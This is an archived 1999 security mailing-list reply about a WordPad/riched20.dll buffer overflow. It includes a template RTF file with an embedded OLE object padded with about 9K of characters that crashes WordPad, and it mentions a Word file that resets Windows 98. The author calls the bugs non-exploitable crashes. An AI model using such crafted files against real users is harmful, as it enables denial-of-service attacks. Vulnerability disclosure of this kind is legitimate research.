Re: WordPad/riched20.dll buffer overflow

From: Ussr Labs (labsat_private)
Date: Tue Nov 23 1999 - 17:06:45 PST

Next message: Ussr Labs: "Multiples Remotes DoS Attacks in MDaemon Server v2.8.5.0"

Previous message: Aleph One: "Security Bulletins Digest"
Maybe in reply to: Pauli Ojanpera: "WordPad/riched20.dll buffer overflow"
Next in thread: Gerardo Richarte: "Re: WordPad/riched20.dll buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Well, I find SOME ways to CRASH (no exploit possibly), in another place in
the format rft, in the richie20.dll, making a EATER OF STACK,
Inside in the rtf file,

One rtf inside of another with OLE, the ole(wordpad), crash , with a STACK
OVERFLOW EXCEPTION FILTER,

EXAMPLE RTF CODE:

{\rtf1\ansi\ansicpg1252\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans
Serif;}{\f1
\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}{\f3\froman Times New
Ro
man;}}
{\colortbl\red0\green0\blue0;}
\deflang1033\horzdoc{\*\fchars }{\*\lchars }\pard\plain\f2\fs20
hello!!!!{\obje
ct\objemb{\*\objclass WordPad.Document.1}{\*\objname
Object1}\objw11115\objh293
{\*\objdata
BUFFER)
}}}\plain\f2\fs20 !!!!!!!!!!!!!!!!
\par }

WERE BUFFER IS LIKE 9K OF (123456789ABCDEFGHIJKLMNOPQRSTUVWYZ)



But its just eat the stack, OLE crash, and not are possibly make exploit on
this.

is another example of another bug in ole/riche20.dll all in wordpad.exe


Ussrlabs

I have another example same happen in word files, personally I did a .doc
file, if you run it machine reset in Microsoft word 2000, 97, in windows 98,
and in nt crash and leave word in memory (present) like a memory process
leek, but its just a bug no way to exploit it, the only thing possibly is
reset the machine in windows 98 :).



u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com


>My assertion was based on a cursory look and the fact the return address
>_is_ overwritten. I'll bow to the greater and more indepth analysis of
>USSRLABS and Solar Eclipse. No doubt, however, there will be buffer
overruns
>elsewhere within the application and not just after the {rtf1\AA...} part.
>I've not actually looked but if you do I can almost guarantee there will be
>more. Perhaps one of these will _not_ be restricted to A-Z and a-z and then
>it would have a chance of being exploitable. For example there is an
>{operator Name-Goes-Here} part of a windows RTF file. By doing
>{operatorAAA.... Name} or {operator AAAA...} may cause a buffer overrun -
>and one where the return address is overwritten and any characters are
>allowed. This is mostly conjecture however. Anyone with the time or
>inclination could check on this or any of the other rtf headers.

Next message: Ussr Labs: "Multiples Remotes DoS Attacks in MDaemon Server v2.8.5.0"
Previous message: Aleph One: "Security Bulletins Digest"
Maybe in reply to: Pauli Ojanpera: "WordPad/riched20.dll buffer overflow"
Next in thread: Gerardo Richarte: "Re: WordPad/riched20.dll buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:14:02 PDT